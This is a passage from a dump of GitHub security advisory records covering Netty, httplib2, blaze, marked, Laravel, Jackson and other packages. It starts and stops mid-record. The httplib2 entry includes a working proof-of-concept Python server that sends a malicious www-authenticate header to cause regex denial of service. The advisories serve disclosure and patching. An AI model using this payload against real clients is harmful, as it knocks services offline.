https://github.com/netty/netty/blob/e5951d46fc89db507ba7d2968d2ede26378f0b04/handler/src/main/java/io/netty/handler/ssl/util/SelfSignedCertificate.java#L316-L346 +> +> One is here, where the certificate is written to a temporary file. +> +> https://github.com/netty/netty/blob/e5951d46fc89db507ba7d2968d2ede26378f0b04/handler/src/main/java/io/netty/handler/ssl/util/SelfSignedCertificate.java#L348-L371 +> +> The final one is here, where the 'AbstractDiskHttpData' creates a temporary file if the getBaseDirectory() method returns null. I believe that 'AbstractDiskHttpData' is used as a part of the file upload support? If this is the case, any files uploaded would be similarly vulnerable. +> +> https://github.com/netty/netty/blob/e5951d46fc89db507ba7d2968d2ede26378f0b04/codec-http/src/main/java/io/netty/handler/codec/http/multipart/AbstractDiskHttpData.java#L91 +> +> All of these vulnerabilities exist because `File.createTempFile(String, String)` will create a temporary file in the system temporary directory if the 'java.io.tmpdir' system property is not explicitly set. It is my understanding that when java creates a file, by default, and using this method, the permissions on that file utilize the umask. In a majority of cases, this means that the file that java creates has the permissions: `-rw-r--r--`, thus, any other local user on that system can read the contents of that file. +> +> Impacted OS: +> - Any OS where the system temporary directory is shared between multiple users. This is not the case for MacOS or Windows. +> +> Mitigation. +> +> Moving to the `Files` API instead will fix this vulnerability. +> https://docs.oracle.com/javase/8/docs/api/java/nio/file/Files.html#createTempFile-java.nio.file.Path-java.lang.String-java.lang.String-java.nio.file.attribute.FileAttribute...- +> +> This API will explicitly set the posix file permissions to something safe, by default. +> +> I recently disclosed a similar vulnerability in JUnit 4: +> https://github.com/junit-team/junit4/security/advisories/GHSA-269g-pwp5-87pp +> +> If you're also curious, this vulnerability in Jetty was also mine, also involving temporary directories, but is not the same vulnerability as in this case. +> https://github.com/eclipse/jetty.project/security/advisories/GHSA-g3wg-6mcf-8jj6 +> +> I would appreciate it if we could perform disclosure of this vulnerability leveraging the GitHub security advisories feature here. GitHub has a nice credit system that I appreciate, plus the disclosures, as you can see from the sampling above, end up looking very nice. +> https://github.com/netty/netty/security/advisories +> +> This vulnerability disclosure follows Google's [90-day vulnerability disclosure policy](https://www.google.com/about/appsecurity/) (I'm not an employee of Google, I just like their policy). Full disclosure will occur either at the end of the 90-day deadline or whenever a patch is made widely available, whichever occurs first. +> +> Cheers, +> Jonathan Leitschuh","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty-codec-http'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.1.59.Final'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}, {'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}]}], 'database_specific': {'last_known_affected_version_range': '< 4.0.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/netty/netty/security/advisories/GHSA-5mcr-gq6c-3hq2'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21290'}, {'type': 'WEB', 'url': 'https://github.com/netty/netty/commit/c735357bf29d07856ad171c6611a2e1a0e0000ec'}, {'type': 'PACKAGE', 'url': 'https://github.com/netty/netty'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0053443ce19ff125981559f8c51cf66e3ab4350f47812b8cf0733a05@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r02e467123d45006a1dda20a38349e9c74c3a4b53e2e07be0939ecb3f@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0857b613604c696bf9743f0af047360baaded48b1c75cf6945a083c5@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r10308b625e49d4e9491d7e079606ca0df2f0a4d828f1ad1da64ba47b@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1908a34b9cc7120e5c19968a116ddbcffea5e9deb76c2be4fa461904@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2748097ea4b774292539cf3de6e3b267fc7a88d6c8ec40f4e2e87bd4@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2936730ef0a06e724b96539bc7eacfcd3628987c16b1b99c790e7b87@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2fda4dab73097051977f2ab818f75e04fbcb15bb1003c8530eac1059@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r326ec431f06eab7cb7113a7a338e59731b8d556d05258457f12bac1b@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4efed2c501681cb2e8d629da16e48d9eac429624fd4c9a8c6b8e7020@%3Cdev.tinkerpop.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r584cf871f188c406d8bd447ff4e2fd9817fca862436c064d0951a071@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r59bac5c09f7a4179b9e2460e8f41c278aaf3b9a21cc23678eb893e41@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5bf303d7c04da78f276765da08559fdc62420f1df539b277ca31f63b@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5c701840aa2845191721e39821445e1e8c59711e71942b7796a6ec29@%3Cusers.activemq.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5e4a540089760c8ecc2c411309d74264f1dad634ad93ad583ca16214@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5e66e286afb5506cdfe9bbf68a323e8d09614f6d1ddc806ed0224700@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r71dbb66747ff537640bb91eb0b2b24edef21ac07728097016f58b01f@%3Ccommits.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r743149dcc8db1de473e6bff0b3ddf10140a7357bc2add75f7d1fbb12@%3Cdev.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r790c2926efcd062067eb18fde2486527596d7275381cfaff2f7b3890@%3Cissues.bookkeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7bb3cdc192e9a6f863d3ea05422f09fa1ae2b88d4663e63696ee7ef5@%3Cdev.ranger.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r9924ef9357537722b28d04c98a189750b80694a19754e5057c34ca48@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra0fc2b4553dd7aaf75febb61052b7f1243ac3a180a71c01f29093013@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/ra503756ced78fdc2136bd33e87cb7553028645b261b1f5c6186a121e@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb06c1e766aa45ee422e8261a8249b561784186483e8f742ea627bda4@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb51d6202ff1a773f96eaa694b7da4ad3f44922c40b3d4e1a19c2f325@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rb592033a2462548d061a83ac9449c5ff66098751748fcd1e2d008233@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc0087125cb15b4b78e44000f841cd37fefedfda942fd7ddf3ad1b528@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rc488f80094872ad925f0c73d283d4c00d32def81977438e27a3dc2bb@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rcd163e421273e8dca1c71ea298dce3dd11b41d51c3a812e0394e6a5d@%3Ccommits.pulsar.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rdba4f78ac55f803893a1a2265181595e79e3aa027e2e651dfba98c18@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/02/msg00016.html'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20220210-0011/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-4885'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-378', 'CWE-379', 'CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-02-08T20:07:45Z', 'nvd_published_at': '2021-02-08T20:15:00Z'}" +1.4.0,GHSA-qfmr-6qvh-49gm,2021-02-25T01:44:38Z,2021-02-25T01:44:38Z,2021-02-25T01:44:38Z,[],XSS,"**Withdrawn:** Duplicate of GHSA-vcjj-xf2r-mwvc. + +Knockout, before 3.5.0-beta, has an XSS injection point in attr name binding for browser IE7 and older.",[],"[{'package': {'ecosystem': 'npm', 'name': 'knockout'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/knockout/knockout/issues/1244'}, {'type': 'WEB', 'url': 'https://github.com/knockout/knockout/commit/86b06aa8633f9f72b953f512df7471a22689ea14'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-05-22T15:03:20Z', 'nvd_published_at': None}" +1.4.0,GHSA-93xj-8mrv-444m,2021-02-08T19:41:34Z,2021-02-08T19:41:59Z,,['CVE-2021-21240'],Regular Expression Denial of Service (REDoS) in httplib2,"### Impact +A malicious server which responds with long series of `\xa0` characters in the `www-authenticate` header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. + +### Patches +Version 0.19.0 contains new implementation of auth headers parsing, using pyparsing library. +https://github.com/httplib2/httplib2/pull/182 + +### Workarounds +```py +import httplib2 +httplib2.USE_WWW_AUTH_STRICT_PARSING = True +``` + +### Technical Details + +The vulnerable regular expression is https://github.com/httplib2/httplib2/blob/595e248d0958c00e83cb28f136a2a54772772b50/python3/httplib2/__init__.py#L336-L338 + +The section before the equals sign contains multiple overlapping groups. Ignoring the optional part containing a comma, we have: + + \s*[^ \t\r\n=]+\s*= + +Since all three infinitely repeating groups accept the non-breaking space character `\xa0`, a long string of `\xa0` causes catastrophic backtracking. + +The complexity is cubic, so doubling the length of the malicious string of `\xa0` makes processing take 8 times as long. + +### Reproduction Steps + +Run a malicious server which responds with + + www-authenticate: x \xa0\xa0\xa0\xa0x + +but with many more `\xa0` characters. + +An example malicious python server is below: + +```py +from http.server import BaseHTTPRequestHandler, HTTPServer + +def make_header_value(n_spaces): + repeat = ""\xa0"" * n_spaces + return f""x {repeat}x"" + +class Handler(BaseHTTPRequestHandler): + def do_GET(self): + self.log_request(401) + self.send_response_only(401) # Don't bother sending Server and Date + n_spaces = ( + int(self.path[1:]) # Can GET e.g. /100 to test shorter sequences + if len(self.path) > 1 else + 65512 # Max header line length 65536 + ) + value = make_header_value(n_spaces) + self.send_header(""www-authenticate"", value) # This header can actually be sent multiple times + self.end_headers() + +if __name__ == ""__main__"": + HTTPServer(("""", 1337), Handler).serve_forever() +``` + +Connect to the server with httplib2: + +```py +import httplib2 +httplib2.Http("".cache"").request(""http://localhost:1337"", ""GET"") +``` + +To benchmark performance with shorter strings, you can set the path to a number e.g. http://localhost:1337/1000 + + +### References +Thanks to [Ben Caller](https://github.com/b-c-ds) ([Doyensec](https://doyensec.com)) for finding vulnerability and discrete notification. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [httplib2](https://github.com/httplib2/httplib2/issues/new) +* Email [current maintainer at 2021-01](mailto:temotor@gmail.com)",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'httplib2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.19.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21240'}, {'type': 'WEB', 'url': 'https://github.com/httplib2/httplib2/pull/182'}, {'type': 'WEB', 'url': 'https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc'}, {'type': 'WEB', 'url': 'https://pypi.org/project/httplib2'}]","{'cwe_ids': ['CWE-400'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-02-08T19:41:34Z', 'nvd_published_at': '2021-02-08T20:15:00Z'}" +1.4.0,GHSA-xmw9-q7x9-j5qc,2022-10-25T20:21:46Z,2021-02-02T21:42:49Z,,['CVE-2021-21293'],Unbounded connection acceptance leads to file handle exhaustion,"### Impact + +All servers running blaze-core <= 0.14.14, including blaze-http and http4s-blaze-server users, are affected. + +Blaze, accepts connections unconditionally on a dedicated thread pool. This has the net effect of amplifying degradation in services that are unable to handle their current request load, since incoming connections are still accepted and added to an unbounded queue. Each connection allocates a socket handle, which drains a scarce OS resource. This can also confound higher level circuit breakers which work based on detecting failed connections. + +The vast majority of affected users are using it as part of http4s-blaze-server <= 0.21.16. http4s provides a mechanism for limiting open connections, but is enforced inside the Blaze accept loop, after the connection is accepted and the socket opened. Thus, the limit only prevents the number of connections which can be simultaneously processed, not the number of connections which can be held open. + +### Patches + +The issue is fixed in version 0.14.15 for `NIO1SocketServerGroup`. A `maxConnections` parameter is added, with a default value of 512. Concurrent connections beyond this limit are rejected. To run unbounded, which is not recommended, set a negative number. + +The `NIO2SocketServerGroup` has no such setting and is now deprecated. + +### Workarounds +* An Nginx side-car acting as a reverse proxy for the local http4s-blaze-server instance would be able to apply a connection limiting semantic before the sockets reach blaze-core. Nginx’s connection bounding is both asynchronous and properly respects backpressure. +* A similar sidecar strategy is viable for other non-HTTP services running on blaze-core. +* http4s-ember-server is an alternative to http4s-blaze-server, but does not yet have HTTP/2 or web socket support. Its performance in terms of RPS is appreciably behind Blaze’s, and as the newest backend, has substantially less industrial uptake. +* http4s-jetty is an alternative to http4s-blaze-server, but does not yet have web socket support. Its performance in terms of requests per second is somewhat behind Blaze’s, and despite Jetty's industrial adoption, the http4s integration has substantially less industrial uptake. +* http4s-tomcat is an alternative to http4s-blaze-server, but does not yet have HTTP/2 web socket support. Its performance in terms of requests per second is somewhat behind Blaze’s, and despite Jetty's industrial adoption, the http4s integration has substantially less industrial uptake. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [http4s/blaze](http://github.com/http4s/blaze) +* Contact us according to the [http4s security policy](https://github.com/http4s/http4s/security/policy)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.http4s:blaze-core_2.11'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.14.15'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.http4s:blaze-core_2.12'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.14.15'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.http4s:blaze-core_2.13'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.14.15'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/http4s/blaze/security/advisories/GHSA-xmw9-q7x9-j5qc'}, {'type': 'WEB', 'url': 'https://github.com/http4s/http4s/security/advisories/GHSA-xhv5-w9c5-2r2w'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21293'}, {'type': 'WEB', 'url': 'https://github.com/http4s/blaze/commit/4f786177f9fb71ab272f3a5f6c80bca3e5662aa1'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-02T21:40:18Z', 'nvd_published_at': '2021-02-02T22:15:00Z'}" +1.4.0,GHSA-wjmf-58vc-xqjr,2021-02-25T02:01:56Z,2021-02-25T02:01:56Z,2021-02-25T02:01:56Z,[],Content injection in marked,Versions 0.3.7 and earlier of marked When mangling is disabled via option mangle don't escape target href. This allow attacker to inject arbitrary html-event into resulting a tag.,[],"[{'package': {'ecosystem': 'npm', 'name': 'marked'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/markedjs/marked/issues/926'}, {'type': 'WEB', 'url': 'https://github.com/markedjs/marked/commit/cb72584c5d9d32ebfdbb99e35fb9b81af2b79686'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-06-05T20:56:48Z', 'nvd_published_at': None}" +1.4.0,GHSA-w736-hf9p-qqh3,2021-02-05T21:21:40Z,2021-02-08T17:43:36Z,,[],Key Caching behavior in the DynamoDB Encryption Client.,"### Impact +This advisory concerns users of MostRecentProvider in the DynamoDB Encryption Client with a key provider like AWS Key Management Service that allows for permissions on keys to be modified. + +When key usage permissions were changed at the key provider, time-based key reauthorization logic in MostRecentProvider did not reauthorize the use of the key. This created the potential for keys to be used in the DynamoDB Encryption Client after permissions to do so were revoked at the key provider. + +### Patches +Fixed as of 1.15.0. We recommend users to modify their code and adopt `CachingMostRecentProvider`. + +### Workarounds +Users who cannot upgrade to use the `CachingMostRecentProvider` can call `clear()` on the cache to manually flush all of its contents. Next use of the key will force a re-validation to occur with the key provider.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'com.amazonaws:aws-dynamodb-encryption-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/aws/aws-dynamodb-encryption-java/security/advisories/GHSA-w736-hf9p-qqh3'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-dynamodb-encryption-java/commit/7de5f5a5929271ab25bce685089eb7ec564dac4b'}, {'type': 'WEB', 'url': 'https://github.com/aws/aws-dynamodb-encryption-java/blob/master/CHANGELOG.md#1150----2021-02-04'}]","{'cwe_ids': ['CWE-862'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-02-05T21:21:40Z', 'nvd_published_at': None}" +1.4.0,GHSA-x7p5-p2c9-phvg,2021-02-02T15:46:07Z,2021-02-02T15:47:08Z,,[],Unexpected database bindings,"This is a follow-up to the previous security advisory (GHSA-3p32-j457-pg5x) which addresses a few additional edge cases. + +If a request is crafted where a field that is normally a non-array value is an array, and that input is not validated or cast to its expected type before being passed to the query builder, an unexpected number of query bindings can be added to the query. In some situations, this will simply lead to no results being returned by the query builder; however, it is possible certain queries could be affected in a way that causes the query to return unexpected results.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'laravel/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.20.14'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'laravel/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.30.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'laravel/framework'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.24.0'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'illuminate/database'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.20.14'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'illuminate/database'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '7.0.0'}, {'fixed': '7.30.4'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'illuminate/database'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.24.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/laravel/framework/security/advisories/GHSA-x7p5-p2c9-phvg'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-3p32-j457-pg5x'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/illuminate/database'}, {'type': 'WEB', 'url': 'https://packagist.org/packages/laravel/framework'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-02-02T15:46:07Z', 'nvd_published_at': None}" +1.4.0,GHSA-5hx7-77g4-wqx3,2021-02-23T21:30:56Z,2021-02-23T21:30:56Z,2021-02-23T21:30:56Z,[],Incorrect Authorization,Versions of aedes before 0.35.1 does not respect its own authorization rules when a client sets a Last Will.,[],"[{'package': {'ecosystem': 'npm', 'name': 'aedes'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.1.0'}, {'fixed': '0.35.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/mcollina/aedes/issues/211'}, {'type': 'WEB', 'url': 'https://github.com/mcollina/aedes/commit/ffbc1702bb24b596afbb96407cc6db234a4044a8'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2019-05-29T19:18:50Z', 'nvd_published_at': None}" +1.4.0,GHSA-288c-cq4h-88gq,2022-02-08T22:02:19Z,2021-02-18T20:51:54Z,,['CVE-2020-25649'],XML External Entity (XXE) Injection in Jackson Databind,"A flaw was found in FasterXML Jackson Databind, where it did not have entity expansion secured properly. This flaw allows vulnerability to XML external entity (XXE) attacks. The highest threat from this vulnerability is data integrity.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.6.0'}, {'fixed': '2.6.7.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.6.7.3'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.7.0.0'}, {'fixed': '2.9.10.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.9.10.6'}}, {'package': {'ecosystem': 'Maven', 'name': 'com.fasterxml.jackson.core:jackson-databind'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.10.0.0'}, {'fixed': '2.10.5.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.10.5.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25649'}, {'type': 'WEB', 'url': 'https://github.com/FasterXML/jackson-databind/issues/2589'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1887664'}, {'type': 'PACKAGE', 'url': 'https://github.com/FasterXML/jackson-databind'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r011d1430e8f40dff9550c3bc5d0f48b14c01ba8aecabd91d5e495386@%3Ccommits.turbine.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r024b7bda9c43c5560d81238748775c5ecfe01b57280f90df1f773949@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r04529cedaca40c2ff90af4880493f9c88a8ebf4d1d6c861d23108a5a@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0881e23bd9034c8f51fdccdc8f4d085ba985dcd738f8520569ca5c3d@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r0b8dc3acd4503e4ecb6fbd6ea7d95f59941168d8452ac0ab1d1d96bb@%3Cissues.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r1b7ed0c4b6c4301d4dfd6fdbc5581b0a789d3240cab55d766f33c6c6@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2882fc1f3032cd7be66e28787f04ec6f1874ac68d47e310e30ff7eb1@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2b6ddb3a4f4cd11d8f6305011e1b7438ba813511f2e3ab3180c7ffda@%3Ccommits.druid.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2eb66c182853c69ecfb52f63d3dec09495e9b65be829fd889a081ae1@%3Cdev.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r2f5c5479f99398ef344b7ebd4d90bc3316236c45d0f3bc42090efcd7@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r31f4ee7d561d56a0c2c2c6eb1d6ce3e05917ff9654fdbfec05dc2b83@%3Ccommits.servicecomb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r3e6ae311842de4e64c5d560a475b7f9cc7e0a9a8649363c6cf7537eb@%3Ccommits.karaf.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r407538adec3185dd35a05c9a26ae2f74425b15132470cf540f41d85b@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r45e7350dfc92bb192f3f88e9971c11ab2be0953cc375be3dda5170bd@%3Cissues.flink.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5b130fe668503c4b7e2caf1b16f86b7f2070fd1b7ef8f26195a2ffbd@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r5f8a1608d758936bd6bbc5eed980777437b611537bf6fff40663fc71@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r605764e05e201db33b3e9c2e66ff620658f07ad74f296abe483f7042@%3Creviews.iotdb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r61db8e7dcb56dc000a5387a88f7a473bacec5ee01b9ff3f55308aacc@%3Cusers.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r63c87aab97155f3f3cbe11d030c4a184ea0de440ee714977db02e956@%3Cjira.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r68d029ee74ab0f3b0569d0c05f5688cb45dd3abe96a6534735252805@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6a4f3ef6edfed2e0884269d84798f766779bbbc1005f7884e0800d61@%3Cdev.knox.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6a6df5647583541e3cb71c75141008802f7025cee1c430d4ed78f4cc@%3Cissues.hive.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cdev.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6b11eca1d646f45eb0d35d174e6b1e47cfae5295b92000856bfb6304@%3Cusers.kafka.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6cbd599b80e787f02ff7a1391d9278a03f37d6a6f4f943f0f01a62fb@%3Creviews.iotdb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r6e3d4f7991542119a4ca6330271d7fbf7b9fb3abab24ada82ddf1ee4@%3Cnotifications.zookeeper.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r73bef1bb601a9f093f915f8075eb49fcca51efade57b817afd5def07@%3Ccommits.iotdb.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r765283e145049df9b8998f14dcd444345555aae02b1610cfb3188bf8@%3Cnotifications.iotdb.apache.org%3E'}, {'type': 'WEB', 'url': 